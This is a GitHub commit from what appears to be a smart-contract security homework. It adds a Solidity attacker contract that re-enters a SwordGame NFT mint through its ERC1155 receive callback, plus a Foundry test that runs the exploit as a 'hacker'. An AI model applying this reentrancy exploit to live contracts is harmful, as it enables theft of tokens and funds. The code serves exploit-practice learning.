-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
3 changed files
with
57 additions
and
6 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| // SPDX-License-Identifier: UNLICENSED | ||
| pragma solidity ^0.8.20; | ||
|
|
||
| import {SwordGame} from "src/hw/hw1.sol"; | ||
| import {Test, console} from "forge-std/Test.sol"; | ||
|
|
||
| contract AttackHW1 { | ||
| SwordGame public swordGame; | ||
| uint256 public tokenId = 1; | ||
| uint256 public nftCount; | ||
|
|
||
| constructor(SwordGame _swordGame) { | ||
| swordGame = _swordGame; | ||
| } | ||
|
|
||
| receive() external payable {} | ||
|
|
||
| function attack() public payable { | ||
| swordGame.mint{value: 1 ether}(tokenId); | ||
| } | ||
|
|
||
| function onERC1155Received( | ||
| address, // operator | ||
| address, // from | ||
| uint256, // id | ||
| uint256 amount, // amount | ||
| bytes calldata // data | ||
| ) external returns (bytes4) { | ||
| nftCount += amount; | ||
| console.log("nftCount", nftCount); | ||
| // 循环调用 mint 函数 | ||
| while (nftCount < 10) { | ||
| try swordGame.mint{value: 1 ether}(tokenId) { | ||
| nftCount++; | ||
| } catch { | ||
| console.log("error", nftCount); | ||
| break; | ||
| } | ||
| } | ||
|
|
||
| return this.onERC1155Received.selector; | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,27 +1,29 @@ | ||
| // SPDX-License-Identifier: UNLICENSED | ||
| pragma solidity ^0.8.0; | ||
| pragma solidity ^0.8.20; | ||
|
|
||
| import {Test} from "forge-std/Test.sol"; | ||
| import {Test, console} from "forge-std/Test.sol"; | ||
| import {SwordGame} from "src/hw/hw1.sol"; | ||
| import {AttackHW1} from "src/example/attackHw1.sol"; | ||
|
|
||
| contract exploitNFTTest is Test { | ||
| SwordGame swordGame; | ||
| address public owner = address(0); | ||
| AttackHW1 attackHW1; | ||
| address public owner1 = address(1); | ||
| address public hacker = address(1337); | ||
|
|
||
| function setUp() public { | ||
| vm.startPrank(owner); | ||
| vm.startPrank(owner1); | ||
| swordGame = new SwordGame(); | ||
| attackHW1 = new AttackHW1(swordGame); | ||
| vm.stopPrank(); | ||
|
|
||
| vm.deal(hacker, 1 ether); | ||
| } | ||
|
|
||
| function testExploit() public { | ||
| vm.startPrank(hacker); | ||
| // add your solution here | ||
| attackHW1.attack{value: 1 ether}(); | ||
| vm.stopPrank(); | ||
|
|
||
| assertEq(swordGame.balanceOf(hacker, 1), 10); | ||
| } | ||
| } |